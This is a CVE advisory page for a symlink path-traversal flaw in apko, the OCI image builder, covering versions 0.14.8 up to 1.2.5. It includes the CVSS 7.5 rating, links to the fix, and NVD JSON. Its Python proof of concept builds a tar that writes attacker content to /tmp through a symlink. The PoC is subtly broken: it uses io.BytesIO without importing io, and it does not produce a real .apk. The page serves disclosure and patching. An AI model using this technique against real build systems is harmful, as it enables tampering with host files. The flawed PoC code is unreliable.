CVE-2026-42574

Description

apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

apko >= 0.14.8, < 1.2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import tarfile
import os

# Create a malicious tar file (simulating crafted .apk)
filename = "exploit.apk"

# 1. Create a symlink entry pointing outside the build root (e.g., /tmp)
link = tarfile.TarInfo(name="path/to/evil_link")
link.type = tarfile.SYMTYPE
link.linkname = "/tmp/pwned" # Target outside root

# 2. Create a file entry that writes through the symlink
file_content = b"MALICIOUS CONTENT"
file_entry = tarfile.TarInfo(name="path/to/evil_link/malicious.txt")
file_entry.size = len(file_content)

with tarfile.open(filename, "w") as tar:
    tar.addfile(link)
    tar.addfile(file_entry, io.BytesIO(file_content))

print(f"Created {filename}. When apko extracts this, it writes to /tmp/pwned/malicious.txt")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42574
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42574
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42574/
[4] VulDB https://vuldb.com/cve/CVE-2026-42574
[5] https://github.com/chainguard-dev/apko/commit/f5a96e1299ac81c7ea9441705ec467688086f442
[6] https://github.com/chainguard-dev/apko/pull/2187
[7] https://github.com/chainguard-dev/apko/releases/tag/v1.2.5
[8] https://github.com/chainguard-dev/apko/security/advisories/GHSA-qq3r-w4hj-gjp6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42574", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:29.420", "lastModified": "2026-05-09T20:16:29.420", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://github.com/chainguard-dev/apko/commit/f5a96e1299ac81c7ea9441705ec467688086f442", "source": "[email protected]"}, {"url": "https://github.com/chainguard-dev/apko/pull/2187", "source": "[email protected]"}, {"url": "https://github.com/chainguard-dev/apko/releases/tag/v1.2.5", "source": "[email protected]"}, {"url": "https://github.com/chainguard-dev/apko/security/advisories/GHSA-qq3r-w4hj-gjp6", "source": "[email protected]"}]}}